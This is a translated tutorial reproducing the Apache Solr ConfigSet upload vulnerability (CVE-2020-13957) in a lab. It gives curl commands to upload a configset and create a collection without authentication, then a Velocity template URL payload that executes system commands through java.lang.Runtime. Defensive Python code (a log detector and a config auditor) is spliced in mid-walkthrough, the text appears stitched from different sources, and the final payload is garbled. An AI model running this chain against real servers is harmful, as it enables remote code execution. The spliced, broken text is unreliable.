2025-04-02 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Apache Solr unauthorized upload vulnerability CVE-2020-13957 reproduction: many newcomers are unclear about this issue, so to help you work through it the following walkthrough explains it in detail. Anyone who needs it is welcome to follow along; I hope you get something out of it.
0x00 Vulnerability description
An unauthorized upload vulnerability exists in ConfigSet API in certain versions of Solr, which can be exploited by an attacker for remote code execution.
The complete exploitation chain:
Upload a configset -- upload a second configset based on the first (this skips the identity check) -- create a collection with the new configset -- use the Solr Velocity template for RCE
Affected versions
Apache Solr 6.6.0-6.6.5
Apache Solr 7.0.0-7.7.3
Apache Solr 8.0.0-8.6.2
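The chain described above (configset upload, collection creation from that configset, then a request with the Velocity response writer) leaves a recognizable trace in Solr's Jetty request log. The following is an added defensive example, not code from the original article: it checks a Solr version string against the affected ranges listed above and walks constructed request-log lines (NCSA format, using the hosts named in this walkthrough) to flag each stage of the chain per source IP. The log lines are constructed samples; the template body is replaced by a placeholder because it is not needed to detect the pattern.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Affected ranges as listed in the advisory text above (inclusive).
AFFECTED = [((6, 6, 0), (6, 6, 5)), ((7, 0, 0), (7, 7, 3)), ((8, 0, 0), (8, 6, 2))]


def is_affected_version(version):
    """True if a dotted Solr version falls inside one of the affected ranges."""
    v = tuple(int(x) for x in version.split("."))
    return any(lo <= v <= hi for lo, hi in AFFECTED)


# Constructed sample request-log lines (Jetty NCSA format). The attacker host
# 192.168.41.132 performs the three stages; 192.168.41.50 is benign traffic.
SAMPLE_LOG = """\
192.168.41.132 - - [31/May/2020:10:15:01 +0000] "POST /solr/admin/configs?action=UPLOAD&name=mytest HTTP/1.1" 200 124
192.168.41.50 - - [31/May/2020:10:15:05 +0000] "GET /solr/admin/collections?action=LIST&wt=json HTTP/1.1" 200 310
192.168.41.132 - - [31/May/2020:10:15:09 +0000] "GET /solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest HTTP/1.1" 200 512
192.168.41.132 - - [31/May/2020:10:15:20 +0000] "GET /solr/mytest2/select?q=1&wt=velocity&v.template=custom&v.template.custom=TEMPLATE_PLACEHOLDER HTTP/1.1" 200 88
192.168.41.50 - - [31/May/2020:10:15:31 +0000] "GET /solr/mytest2/select?q=*:*&wt=json HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one NCSA request-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "path": url.path, "params": params, "status": int(m.group("status"))}


def detect_configset_chain(log_text):
    """Return (stage, source_ip, object) findings for each stage of the chain.

    Stage names:
      configset_upload                   - ConfigSet API UPLOAD seen
      collection_from_uploaded_configset - CREATE referencing a configset the same IP uploaded
      velocity_on_uploaded_collection    - Velocity writer used against such a collection
      velocity_response_writer           - Velocity writer used against any other collection
    """
    findings = []
    uploaded = defaultdict(set)   # source ip -> configset names it uploaded
    created = {}                  # collection name -> (ip, configset)
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if not ev:
            continue
        p, q = ev["path"], ev["params"]
        action = q.get("action", "").upper()
        if p == "/solr/admin/configs" and action == "UPLOAD":
            name = q.get("name", "")
            uploaded[ev["ip"]].add(name)
            findings.append(("configset_upload", ev["ip"], name))
        elif p == "/solr/admin/collections" and action == "CREATE":
            name, cs = q.get("name", ""), q.get("collection.configName", "")
            created[name] = (ev["ip"], cs)
            if cs in uploaded.get(ev["ip"], ()):
                findings.append(("collection_from_uploaded_configset", ev["ip"], name))
        elif p.endswith("/select") and (q.get("wt", "").lower() == "velocity" or "v.template" in q):
            parts = p.split("/")           # ['', 'solr', '<collection>', 'select']
            coll = parts[2] if len(parts) >= 4 else ""
            stage = "velocity_on_uploaded_collection" if coll in created else "velocity_response_writer"
            findings.append((stage, ev["ip"], coll))
    return findings


if __name__ == "__main__":
    print("8.0.0 affected:", is_affected_version("8.0.0"))
    for f in detect_configset_chain(SAMPLE_LOG):
        print(*f)
```

Any UPLOAD on the ConfigSet API from an unexpected source is worth an alert on its own; the later stages raise the severity. The path-based matching assumes the default `/solr` context path, which is what the walkthrough's URLs use.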
0x01 Environment setup
Solr download address: http://archive.apache.org/dist/lucene/solr/ (this reproduction uses 8.0.0)
Target: Windows 10, IP address 192.168.41.129
Attacker: Kali, IP address 192.168.41.132
Start Solr in SolrCloud mode on the target:
C:\reproduce\solr-8.0.0\bin> solr.cmd start -c
0x02 Vulnerability reproduction
1. Extract solr-8.0.0.zip, go to the solr-8.0.0/server/solr/configsets/_default/conf directory in the extracted tree, open solrconfig.xml, and change the default of velocity.params.resource.loader.enabled from false to true, that is:
<str name="params.resource.loader.enabled">${velocity.params.resource.loader.enabled:true}</str>
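The setting changed in this step is the one that decides whether a Velocity template supplied in request parameters is rendered at all, so it is the first thing to audit on a Solr host. The following is an added example, not code from the original article: it parses a solrconfig.xml fragment, resolves Solr's `${property:default}` placeholders (optionally against a dict of system properties passed on the Solr command line), and reports whether any VelocityResponseWriter has `params.resource.loader.enabled` effectively true. The weak fragment mirrors the modified line above; the corrected fragment is the shipped default, and the third sample shows the stronger fix of not registering the writer at all. All three fragments are constructed samples.

```python
import re
import xml.etree.ElementTree as ET

# Matches Solr's ${prop} / ${prop:default} substitution syntax.
PLACEHOLDER_RE = re.compile(r"^\$\{(?P<prop>[^:}]+)(?::(?P<default>[^}]*))?\}$")


def resolve(value, sysprops=None):
    """Resolve a ${prop:default} placeholder the way Solr substitutes system
    properties (sysprops wins, then the default); plain text is returned as-is."""
    sysprops = sysprops or {}
    m = PLACEHOLDER_RE.match(value.strip())
    if not m:
        return value.strip()
    return sysprops.get(m.group("prop"), m.group("default") or "")


def audit_velocity(solrconfig_xml, sysprops=None):
    """Return one dict per VelocityResponseWriter in the config with its
    effective resource-loader settings."""
    root = ET.fromstring(solrconfig_xml)
    results = []
    for qrw in root.iter("queryResponseWriter"):
        if qrw.get("class") != "solr.VelocityResponseWriter":
            continue
        settings = {s.get("name"): resolve(s.text or "", sysprops) for s in qrw.findall("str")}
        results.append({
            "name": qrw.get("name"),
            "params_loader_enabled": settings.get("params.resource.loader.enabled", "false").lower() == "true",
            "solr_loader_enabled": settings.get("solr.resource.loader.enabled", "true").lower() == "true",
        })
    return results


def params_loader_enabled(solrconfig_xml, sysprops=None):
    """True if any Velocity writer will render templates taken from request params."""
    return any(r["params_loader_enabled"] for r in audit_velocity(solrconfig_xml, sysprops))


# Constructed sample: the weakened setting from the walkthrough step above.
WEAK_CONFIG = """<config>
  <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">
    <str name="template.base.dir">${velocity.template.base.dir:}</str>
    <str name="solr.resource.loader.enabled">${velocity.solr.resource.loader.enabled:true}</str>
    <str name="params.resource.loader.enabled">${velocity.params.resource.loader.enabled:true}</str>
  </queryResponseWriter>
</config>"""

# Constructed sample: the shipped default, params loader off.
FIXED_CONFIG = WEAK_CONFIG.replace("loader.enabled:true}</str>\n  </queryResponseWriter>",
                                   "loader.enabled:false}</str>\n  </queryResponseWriter>")

# Constructed sample: writer not registered at all (no Velocity rendering possible).
NO_VELOCITY_CONFIG = """<config>
  <queryResponseWriter name="json" class="solr.JSONResponseWriter"/>
</config>"""


if __name__ == "__main__":
    for label, cfg in [("weak", WEAK_CONFIG), ("fixed", FIXED_CONFIG), ("removed", NO_VELOCITY_CONFIG)]:
        print(label, "params loader enabled:", params_loader_enabled(cfg))
    # A -Dvelocity.params.resource.loader.enabled=true on the JVM command line
    # re-enables it even with the default config, so the audit takes sysprops too.
    print("fixed + sysprop override:",
          params_loader_enabled(FIXED_CONFIG, {"velocity.params.resource.loader.enabled": "true"}))
```

Because the value is a substituted property, auditing the XML alone is not sufficient: the JVM arguments the Solr process was started with have to be checked as well, which is why the functions accept a `sysprops` mapping.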
Then copy the modified solr-8.0.0 directory to Kali.
2. On Kali, open a terminal in the server/solr/configsets/_default/conf/ directory and run the following command to package all files under conf into the archive mytest.zip:
zip -r - * > mytest.zip
3. Upload mytest.zip to the Windows 10 target; the ConfigSet API accepts the upload without authentication:
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @mytest.zip "http://192.168.41.129:8983/solr/admin/configs?action=UPLOAD&name=mytest"
Create a malicious collection from the newly uploaded configset with the CREATE action:
curl "http://192.168.41.129:8983/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest"
Open the following address in Kali's browser to execute a remote command through the uploaded collection; here whoami is executed.
Http://192.168.41.129:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27) ) + $ex.waitFor () +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end